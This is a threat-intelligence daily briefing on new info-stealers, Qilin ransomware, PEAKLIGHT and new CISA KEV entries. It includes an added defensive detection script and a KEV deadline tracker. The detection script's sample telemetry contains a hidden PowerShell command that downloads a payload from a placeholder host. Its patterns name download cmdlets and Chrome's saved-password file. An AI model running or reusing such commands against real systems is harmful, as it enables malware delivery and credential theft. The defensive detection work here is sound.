Cyware Daily Threat Intelligence

Daily Threat Briefing • Aug 23, 2024
Newly emerging info-stealers are pushing the boundaries of cyber threats, making defenses more crucial than ever. One targets macOS users by disguising itself as legitimate software, stealing sensitive information such as cryptocurrency wallets and game account details. Another is a memory-only dropper and PowerShell-based downloader that delivers a range of malicious payloads via deceptive LNK files.
Alongside these, persistent vulnerabilities in key infrastructure continue to pose serious risks. Critical vulnerabilities have been added to the CISA KEV catalog, including flaws in Dahua IP cameras, the Linux kernel, and Microsoft Exchange Server, which are being actively exploited by threat actors. Federal agencies have until September 11 to address these vulnerabilities.
Emergence of Cthulhu Stealer for macOS
Researchers observed the emergence of a new threat called Cthulhu Stealer. This malware targets macOS users by disguising itself as legitimate software, prompting users to enter their passwords and MetaMask credentials, and then stealing sensitive information such as cryptocurrency wallets and game account details. The functionality of Cthulhu Stealer is similar to another macOS malware called Atomic Stealer, indicating that the code may have been modified from the latter.
Qilin ransomware stole Chrome credentials
The Qilin ransomware group targeted a network's endpoints, stealing credentials stored in Google Chrome browsers. They gained access through compromised credentials and used a logon GPO to execute scripts that harvested credentials on user devices. The stolen credentials were exfiltrated, event logs were cleared, and files were encrypted with a ransom note left behind. The attack exploited the widespread use of Chrome as a credential store, and remediation required defenders to reset all Active Directory passwords.
PEAKLIGHT: new evasive memory-only malware
Mandiant identified a memory-only dropper and PowerShell-based downloader, named PEAKLIGHT, delivering MaaS info-stealers such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The initial infection vector was a Microsoft Shortcut File (LNK) disguised as pirated movies, which executed PowerShell scripts to download and run malicious payloads. The malware uses various obfuscation and evasion techniques and takes advantage of reputable content delivery networks to host its malicious payloads.
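The two behaviours above, the Qilin logon-GPO script that touches Chrome's credential store and the PEAKLIGHT-style LNK that launches a hidden PowerShell downloader, both leave a recognisable trail in endpoint telemetry. The following is an added detection sketch, not code from Cyware, Sophos or Mandiant: it correlates simplified process-creation and file-access records (Sysmon/EDR style) per host and PID. Every event, host name, path and URL below is constructed for the example; the `corp.example` SYSVOL path and the `cdn.example.invalid` host are placeholders.

```python
"""Detection sketch for GPO-script credential harvesting and LNK-launched
PowerShell downloaders. Added example; all telemetry below is constructed."""
import re

# Behavioural indicators. They key on *how* PowerShell was launched and what it
# touched, not on a specific script name or payload hash, so they survive renames.
POWERSHELL_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
SYSVOL_SCRIPT = re.compile(r"\\\\[^\\]+\\sysvol\\", re.IGNORECASE)          # \\domain\SYSVOL\...
CHROME_LOGIN_DATA = re.compile(                                             # Chrome's saved-password DB
    r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.IGNORECASE)
HIDDEN_OR_ENCODED = re.compile(
    r"\s-(w|windowstyle)\s+hidden\b|\s-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
REMOTE_FETCH = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b|https?://",
    re.IGNORECASE)

# Constructed telemetry (not real logs). "process" = process creation,
# "file" = a file read/copy attributed to an existing PID.
EVENTS = [
    # ws01: a benign logon script that maps drives; must NOT alert.
    {"kind": "process", "host": "ws01", "pid": 4120,
     "parent_image": r"C:\Windows\System32\gpscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File \\corp.example\SYSVOL\corp.example\scripts\mapdrives.ps1"},
    {"kind": "file", "host": "ws01", "pid": 4120, "op": "read",
     "path": r"\\corp.example\SYSVOL\corp.example\scripts\mapdrives.ps1"},
    # ws02: logon script launched via GPO that then copies Chrome's Login Data.
    {"kind": "process", "host": "ws02", "pid": 5308,
     "parent_image": r"C:\Windows\System32\gpscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File \\corp.example\SYSVOL\corp.example\scripts\logon.ps1"},
    {"kind": "file", "host": "ws02", "pid": 5308, "op": "copy",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # ws03: PowerShell spawned by explorer.exe (what a double-clicked LNK looks like),
    # hidden window, fetching a second stage from a CDN-looking host.
    {"kind": "process", "host": "ws03", "pid": 7744,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -ep bypass -c iwr https://cdn.example.invalid/x -OutFile $env:TEMP\x"},
]


def detect(events):
    """Return (rule, host, pid) tuples for every event sequence that matches."""
    alerts = []
    # PowerShell processes that were started from a SYSVOL logon script, keyed by
    # (host, pid) so later file events from the same process can be correlated.
    gpo_powershell = {}
    for ev in events:
        if ev["kind"] == "process" and POWERSHELL_IMAGE.search(ev["image"]):
            if SYSVOL_SCRIPT.search(ev["command_line"]):
                gpo_powershell[(ev["host"], ev["pid"])] = ev
            if (ev["parent_image"].lower().endswith("\\explorer.exe")
                    and HIDDEN_OR_ENCODED.search(ev["command_line"])
                    and REMOTE_FETCH.search(ev["command_line"])):
                alerts.append(("lnk_launched_hidden_powershell_downloader", ev["host"], ev["pid"]))
        elif ev["kind"] == "file":
            key = (ev["host"], ev["pid"])
            # A logon script has no business reading the browser's password store.
            if key in gpo_powershell and CHROME_LOGIN_DATA.search(ev["path"]):
                alerts.append(("logon_script_touches_chrome_login_data", ev["host"], ev["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, host, pid in detect(EVENTS):
        print(f"{host} pid={pid}: {rule}")
```

The first rule deliberately needs two events: a SYSVOL-sourced PowerShell launch alone is normal in most domains, so it only fires when the same process then touches `Login Data`. Real telemetry would also carry the user and parent PID, which you would want in the alert for the password-reset work the briefing mentions.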
CISA adds four bugs to KEV catalog
The CISA added several vulnerabilities to its KEV catalog. These include authentication bypass vulnerabilities (CVE-2021-33044 and CVE-2021-33045) in Dahua IP cameras, a Linux kernel heap-based buffer overflow flaw (CVE-2022-0185), and an information disclosure vulnerability (CVE-2021-31196) in Microsoft Exchange Server. The Linux kernel vulnerability has been exploited by threat actors in attacks, allowing unprivileged local users to escalate privileges. The Microsoft Exchange Server vulnerability enables remote code execution and was addressed by Microsoft in May 2021. Federal agencies must address these vulnerabilities by September 11.
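Tracking KEV due dates against your own inventory is the routine job behind a deadline like the one above. The script below is an added example, not Cyware's or CISA's code: it reads a KEV-shaped extract, matches entries to assets by vendor and product, and reports days remaining or overdue for each unpatched asset. The field names (`cveID`, `vendorProject`, `product`, `vulnerabilityName`, `dueDate`) follow CISA's public KEV JSON feed, but the entries, the vendor/product strings, the inventory and the `patched` markers are all constructed here; the due date of 2024-09-11 is assumed from the September 11 deadline in the briefing.

```python
"""Report KEV remediation deadlines for affected assets. Added example; the
catalog extract and the inventory below are constructed, not CISA data."""
import json
from datetime import date

# Constructed extract in the shape of CISA's KEV feed. Only the fields the
# report needs are included; names are illustrative, not CISA's exact wording.
KEV_EXTRACT = json.loads(r"""
{
  "title": "KEV extract (constructed for this example)",
  "vulnerabilities": [
    {"cveID": "CVE-2021-33044", "vendorProject": "Dahua", "product": "IP Camera",
     "vulnerabilityName": "Dahua IP Camera Authentication Bypass", "dueDate": "2024-09-11"},
    {"cveID": "CVE-2021-33045", "vendorProject": "Dahua", "product": "IP Camera",
     "vulnerabilityName": "Dahua IP Camera Authentication Bypass", "dueDate": "2024-09-11"},
    {"cveID": "CVE-2022-0185", "vendorProject": "Linux", "product": "Kernel",
     "vulnerabilityName": "Linux Kernel Heap-Based Buffer Overflow", "dueDate": "2024-09-11"},
    {"cveID": "CVE-2021-31196", "vendorProject": "Microsoft", "product": "Exchange Server",
     "vulnerabilityName": "Microsoft Exchange Server Information Disclosure", "dueDate": "2024-09-11"}
  ]
}
""")

# Constructed asset inventory. "patched" lists CVEs already remediated on that host.
INVENTORY = {
    "cam-lobby-01": {"vendor": "Dahua", "product": "IP Camera", "patched": set()},
    "build-01": {"vendor": "Linux", "product": "Kernel", "patched": set()},
    "mail01": {"vendor": "Microsoft", "product": "Exchange Server",
               "patched": {"CVE-2021-31196"}},       # May 2021 update already applied
}


def affected_assets(entry, inventory):
    """Hosts whose vendor/product match the KEV entry and lack its fix."""
    vendor, product = entry["vendorProject"].lower(), entry["product"].lower()
    return [name for name, asset in inventory.items()
            if asset["vendor"].lower() == vendor
            and asset["product"].lower() == product
            and entry["cveID"] not in asset.get("patched", set())]


def remediation_report(kev, inventory, today):
    """One row per (CVE, host) still open, sorted so the most urgent come first."""
    rows = []
    for entry in kev["vulnerabilities"]:
        due = date.fromisoformat(entry["dueDate"])
        days_left = (due - today).days
        if days_left < 0:
            status = "OVERDUE"
        elif days_left == 0:
            status = "DUE_TODAY"
        else:
            status = f"due in {days_left}d"
        for host in affected_assets(entry, inventory):
            rows.append({"cve": entry["cveID"], "host": host,
                         "dueDate": entry["dueDate"], "days_left": days_left,
                         "status": status})
    rows.sort(key=lambda r: (r["days_left"], r["cve"]))
    return rows


if __name__ == "__main__":
    # Fixed 'today' so the output is reproducible; pass date.today() in practice.
    for row in remediation_report(KEV_EXTRACT, INVENTORY, date(2024, 8, 23)):
        print(f'{row["cve"]:15} {row["host"]:14} due {row["dueDate"]} ({row["status"]})')
```

Matching on vendor and product strings is deliberately coarse: a real inventory should also carry versions so that hosts already running a fixed build are excluded without hand-maintained `patched` sets. Passing `today` as a parameter rather than reading the clock keeps the report testable and lets you re-run it against a past date during an audit.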
Atlassian patches multiple flaws
Atlassian released its August 2024 security bulletin, detailing nine high-severity vulnerabilities in products such as Bamboo, Confluence, Crowd, and Jira. Bamboo Data Center and Server received patches for two high-severity flaws, including an RCE bug (CVE-2024-21689) and a DoS issue (CVE-2024-29857) related to the Bouncy Castle Java dependency. Confluence Data Center and Server also received patches for two high-severity security defects, including a DoS issue in Apache Tomcat (CVE-2024-34750) and a reflected XSS and CSRF issue (CVE-2024-21690). Crowd Data Center and Server had three high-severity SSRF bugs (CVE-2024-22259, CVE-2024-22243, and CVE-2024-22262) resolved, and Jira had a high-severity flaw (CVE-2024-34750) related to Apache Tomcat.